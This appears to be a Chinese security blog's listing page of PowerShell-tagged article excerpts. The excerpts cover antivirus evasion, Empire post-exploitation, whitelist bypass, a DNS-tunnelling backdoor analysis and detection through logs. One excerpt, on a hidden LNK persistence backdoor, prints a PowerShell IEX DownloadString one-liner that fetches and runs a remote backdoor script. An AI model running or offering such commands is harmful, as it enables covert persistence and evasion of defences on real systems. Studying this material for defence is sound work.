记录黑客技术中优秀的内容, 传播黑客文化,分享黑客技术精华

远控免杀从入门到实践(6)-代码篇-Powershell

郑重声明:文中所涉及的技术、思路和工具仅供以安全为目的的学习交流使用,任何人不得将其用于非法用途以及盈利等目的,否则后果自行承担!  《远控免杀从入门到实践》系列文章目录: 1、远控免杀从入门到实践 (1)基础篇 2、远控免杀从入门到实践 (2)工具总结篇 3、远控免杀从入门到实践 (3)代码篇-C/C++ 4、远控免杀从入门到实践 (4)代码篇-C# 5、远控免杀从入门到实践 (5)代码篇-Python 6、远控免杀从入门到实践 (6)代码篇-Powershell 7、远控免杀从入门到实践 (7)代码篇-Golang+Ruby 8、远控免杀从入门到实践 (8)白名单总结篇 9、远控免杀从入门到实践 (9)深入免杀 (暂定) 10、远控免杀从入门到实践 (10
发布时间:2020-03-06 13:43 | 阅读:28651 | 评论:0 | 标签:系统安全 powershell 免杀 远控

Check-LocalAdminHash:一款基于PowerShell的本地管理员识别工具

Check-LocalAdminHash Check-LocalAdminHash是一款基于PowerShell开发的工具,它可以尝试通过WMI或SMB来对多台主机进行身份验证,并通过密码哈希来判断用户提供的凭证是否属于本地管理员账户。 如果你获取到了一个用户账户的密码,并且需要判断该用户账户是否为目标网络系统中的本地管理员账户时,Check-LocalAdminHash就派上用场了。值得一提的是,该工具还集成了两个第三方工具,即Invoke-TheHash(用于凭证检测)和PowerView的脚本工具模块(用于枚举域名计算机)。 我之所以开发这款工具,是因为在一次信息收集活动中,我需要收集目标网络中所有系统的PowerShell命令行历史文件(PSReadline),而PSReadline命令行历史记录实
发布时间:2020-02-20 15:42 | 阅读:26565 | 评论:0 | 标签:工具 Check-LocalAdminHash powershell 识别需求

持续对抗xHunt:通过DNS隧道检测阻止新型PowerShell后门

摘要在对xHunt活动的持续分析过程中,我们观察到存在与pasta58[.]com域名相关联的多个域名,这些域名与已知的Sakabota命令和控制(C2)活动相关。在2019年6月,我们观察到其中一个重复使用的域名(windows64x[.]com)被用作新的基于PowerShell后门的C2服务器,我们将其命名为CASHY200。该PowerShell后门使用DNS隧道与其C2服务器进行通信,通过向上述域名所对应的攻击者控制的域名服务器发出DNS A查询来实现。CASHY200解析C2服务器在DNS回答中提供的数据,以在系统上运行命令,并将结果通过DNS查询的方式发送回C2。在我们所分析的几个样本中,CASHY200
发布时间:2019-11-29 13:25 | 阅读:30305 | 评论:0 | 标签:技术 DNS Powershell xHunt 后门

无 PowerShell.exe 运行 PowerShell 脚本的几种方法

本文将概述在不使用 powershell.exe 的情况下运行 powershell 脚本和命令的最佳工具。在过去的几个月里,我通过观察攻击者以及随之而来的杀毒软件的移动情况后,我打算写这篇文章给所有的渗透测试人员和红队成员,他们正在寻找在后漏洞利用阶段使用 PowerShell 脚本或命令行的最佳技术,而不需要运行 PowerShell.exe,从而避免被下一代杀毒软件、 EDR 或蓝队或威胁追踪团队捕获。在网上,我花了一些时间尝试和分析适合这个目的的不同工具。 对于每一个工具,我都给出了我个人的评分。 请让我知道你的想法以及你的经验或其他与文本提到的类似的工具。 下面是本文中测试的工具列表:· Power
发布时间:2019-11-28 13:25 | 阅读:33251 | 评论:0 | 标签:内网渗透 安全工具 系统安全 Powershell

powershell渗透利用(入门)

Powershell简介PowerShell 是一种命令行外壳程序和脚本环境,使命令行用户和脚本编写者可以利用 .NET Framework的强大功能,并且powershell存在于诸多系统中。Powershell编写脚本很多人不太了解powershell,包括它内置了很多的命令,假如你想写一个powershell脚本,那么可以通过定义函数,然后调用这些命令(因为本人有点小菜,所以就想到一个小小的方法,那就是用后面介绍的ise)。我们可以通过Get-Command命令 。Get-Command使您可以一次显示所有可用的PowerShell命令。          &nb
发布时间:2019-02-26 12:20 | 阅读:69557 | 评论:0 | 标签:技术 Powershell

如何从PowerShell内存转储中提取执行的脚本内容

前言在我们分析了如何从PowerShell进程转储中提取活动历史记录后,又产生了一个有意思的后续问题:“是否可以提取已经执行的脚本内容(来自磁盘),即使这些文件未被捕获?”答案是肯定的,但这一过程也非常复杂。为了详细讲解这一方法,我们将从侦查开始起步。在我们的研究过程中,很多地方都需要WinDbg协助完成自动化操作,因此我们的第一步就是安装WinDbg模块。要部署我们的实验环境,我们编写了这个简单的脚本,并将其保存在类似于C:temp的位置:打开PowerShell会话,运行脚本,然后创建转储文件。现在,使用WinDbg模块连接到转储文件:Connect-DbgSession -ArgumentList&nb
发布时间:2019-02-01 17:20 | 阅读:127429 | 评论:0 | 标签:技术 Powershell

PowerShell无文件持久化技术与常用的防御绕过技术

目前为止,PowerShell仍然是网络安全专家进行防御和黑客进行攻击的首选工具。原因很简单,PowerShell具有很好的可扩展性,支持能力以及适应各种编程语言。如PowerShell Empire,PowerSploit等,都被安全研究人员以及黑客所使用。这两天,就有安全平台检测出了有恶意软件利用PowerShell所进行的攻击,该攻击可以进行持久性攻击并绕过传统安全防护的检测。恶意软件会诱骗用户对网站上的Adobe Flash浏览器插件进行更新,然后使用一个称为mshta.exe的HTA攻击方法。 MSHTA.exe是一个合法的Microsoft二进制文件,可以在任何浏览器中被调用,用于执行.HTA文件。不过在大
发布时间:2019-01-15 12:20 | 阅读:86134 | 评论:0 | 标签:Web安全 Powershell

使用Empire进行黑客攻击——Empire初级指南

大家好,今天本文为大家准备的是Empire的初级指南。据官网介绍“Empire是纯PowerShell后渗透利用代理”,建立在加密的安全通信和灵活的架构之上。Empire—PowerShell后渗透利用代理Empire实现了无需powershell.exe就可以运行powershell代理的能力,可快速部署后渗透利用模块,从键盘记录器到mimikatz,还有自适应良好的通信机制来绕过网络监测,这些功能都集成在注重实用性的框架上。本教程中,我们会讲解该软件所有你需要了解的知识点,从安装到getshell,甚至是在av毫无察觉的情况下获取admin访问权限。在开始之前,你需要了解下面这4个概念。· Listener:·&n
发布时间:2018-10-29 12:20 | 阅读:93248 | 评论:0 | 标签:技术 Empire Powershell

Powershell入门必备(四)

介绍随着我们这个系列文章的逐步深入,我们就越能发现powershell的强大之处,而这种强大只会越来越明显。在本篇文章中,我们会探索如何使用powershell来操作模块。这对我们来说是学习PowerShell的一个非常有趣和重要的部分,因为它在许多任务和操作的自动化方面将会为我们提供许多帮助。使用powershell模块正如我们在前面的文章中看到的,模块是PowerShell里一个非常强大的概念。现在我们会来学习在渗透测试中如何创建和利用它们,特别是用于自动化日常任务。首先,让我们记住模块的定义。Microsoft对模块的描述定义是这样的:· “模块是包含PowerShell命令的包,例如cmdlets,提供程序,函
发布时间:2018-10-08 12:20 | 阅读:124467 | 评论:0 | 标签:内网渗透 安全工具 Powershell

渗透测试神器powershell入门必备(三)–函数和脚本

介绍随着我们本系列文章的逐步深入,我们便会更加明白powershell的强大之处,本文我们就来讲解一些powershell的函数和脚本。Powershell函数基于前两篇文章的介绍,相信大家对powershell有了基本的了解,函数的用法其实也非常简单,只要使用下面的语法即可:function [<scope:>]<name> [([type]$parameter1[,[type]$parameter2])]{param([type]$parameter1 [,[type]$parameter2]) dynamicparam {<state
发布时间:2018-09-11 12:20 | 阅读:98248 | 评论:0 | 标签:系统安全 functions Powershell scripting

如何利用日志来监控和限制PowerShell攻击活动

写在前面的话 近期,我一直在我客户的网络环境中分析PowerShell攻击,根据我的分析以及研究结果,我发现了几种方法来帮助研究人员检测潜在的PowerShell攻击。这种方法主要利用的是Windows的事件日志,首先我们需要了解攻击者是如何使用PowerShell来实施攻击的,然后我们再来看一看相关的检测和防御机制。 PowerShell如何被用于网络攻击之中 PowerShell的能力大家有目共睹,近期也有越来越多的攻击者开始在攻击活动中使用PowerShell了。PowerShell是Windows操作系统自带的工具,因此目标Windows用户的主机中自然也就包含了这种工具。 在我们所观察到的攻击活动中,PowerShell一般会被攻击者用来下载恶意文件。攻击者可以利用PowerShell将远
发布时间:2017-12-09 16:35 | 阅读:120708 | 评论:0 | 标签:系统安全 powershell 日志监控

无文件攻击有多阴险 竟利用“永恒之蓝”传播挖矿机

网络罪犯不需要在你的系统里放上恶意软件就能侵入。无文件/零足迹攻击能够利用合法应用,甚至利用操作系统本身,亦或逃过白名单的检测机制,利用位于批准列表之上且已经安装到机器上的应用,进行攻击。不过,“无文件”、“零足迹”和“非恶意软件”这几个术语,从技术上讲都属于用词不准确的范畴,因为它们往往依赖用户下载恶意附件文件的行为,且确实在计算机上留下了踪迹——只要你知道该找寻什么。实际上,完全零足迹的恶意软件并不存在,因为有很多方法都可以检测出恶意软件——即便恶意软件不把自身安装到硬盘上。而且,它们并不能完全绕过反病毒工具。因为即使不安装可执行程序,反病毒工具还是可以发现恶意附件或恶意链接。只是利用无文件攻击的话,侵入系统的几率会高,这才是真正的威胁所在。无文件恶意软件是越来越大的威胁高级威胁防护厂商Carbon Bla
发布时间:2017-09-28 03:40 | 阅读:124594 | 评论:0 | 标签:行业动态 powershell 恶意软件 挖矿机 无文件攻击 蜜罐

PSAttack:一个包含所有的渗透测试用例的攻击型Powershell脚本框架

目前网上有很多PowerShell攻击工具,比如说著名的Windows日志杀手Invoke-Phant0m。而本文所要介绍的是一款名叫PSAttack的框架,该框架中包含有几乎所有的PowerShell攻击脚本,各位同学在进行渗透测试的过程中肯定会用到它们。 PSAttack下载地址 【PSAttackv1.9】 PSAttack介绍 PSAttack是一款开源的PowerShell脚本框架,其中包含有目前安全社区中多款最优秀的项目。最有趣的地方就在于,这个攻击性PowerShell框架并不依赖于powershell.exe,用户可以直接通过.NET框架来调用PowerShell,这就使得企业环境更加难以阻止这个脚本框架的运行了。其次,该框架中包含的模块都经过了加密处理,而且不会在磁盘上存储,当我们在
发布时间:2017-07-14 18:10 | 阅读:155799 | 评论:0 | 标签:工具 powershell ps attack

如何使用Regsvr32通过应用程序白名单

我最近的一个客户,其红队防御十分先进。该客户有严格的出口管制、边界代理、强观测及极为严格的应用程序白名单控制。我和队友都明白我们得十分卖命地从这个环境中取得命令控制,而那会是在取得物理访问之后(另一项挑战)。 进入场地前一周,我们便开始研究所有可能的应用程序白名单的通过方法。我们假定了最佳防御方案,即除特定经允许的应用外,客户封锁了所有的二进制执行进行。在与其他客户及该客户之前的测试中,我们曾使用过“rundll32. exe”来执行DLL内容。如你可以在DLL(动态链接库)中host溢出检测,并有好的入口点,那这种方法着实有用。在渗透测试指南的案例中,DLL入口点名为“Control_RunDLL”,而这可能会在白名单之外,而且我们也了解这个把戏已经用过,也不抱有过多期望了。 Casey Smith曾发表过一
发布时间:2017-06-08 21:25 | 阅读:166226 | 评论:0 | 标签:技术控 powershell regsvr32 shellcode

AD ACL Scanner:一款扫描活动目录权限并自动生成报告的小工具

今天给大家介绍的是一款基于PowerShell的GUI工具,这款免费工具可以帮助我们生成HTML或CSV格式的活动目录权限报告。 工具下载 【下载地址一】 【下载地址二】 工具介绍 这款活动目录(Active Directory-AD)权限分析器的开发者为Robin Granberg(就职于微软公司),你可以从下面这张截图中看到,你根本不会注意到AD ACL Scanner是基于PowerShell开发出来的。不仅如此,你在使用它的过程中也不需要任何的PowerShell技术。但是,如果你想进行高级活动目录权限分析的话,还需要使用到PowerShell脚本,而此时就可能需要你自行编写PowerShell代码了。 除了扫描活动目录权限之外,AD ACL Scanner还可以帮助我们设置目录权限。但是,如果你想
发布时间:2017-05-19 12:15 | 阅读:169075 | 评论:0 | 标签:工具 powershell 扫描

如何创建Powershell持久隐蔽后门

*本文原创作者:al0ne_,本文属FreeBuf原创奖励计划,未经许可禁止转载 用户开机后每次运行特定的快捷方式文件时触发一段恶意的powershell 代码,原始应用程序仍然启动,原始图标保留,并且没有powershell.exe窗口弹出。 1.安装后门 这次需要用到powershell攻击框架Empire,使用Empire/data/module_source/persistence/Invoke-BackdoorLNK.ps1这个脚本 powershell-nop -exec bypass -c "IEX (New-ObjectNet.WebClient).DownloadString('https://github.com/EmpireProject/Empire/raw/master/data/m
发布时间:2017-05-08 21:35 | 阅读:173947 | 评论:0 | 标签:系统安全 网络安全 powershell 后门

公告

九层之台,起于累土;黑客之术,始于阅读

推广

工具

标签云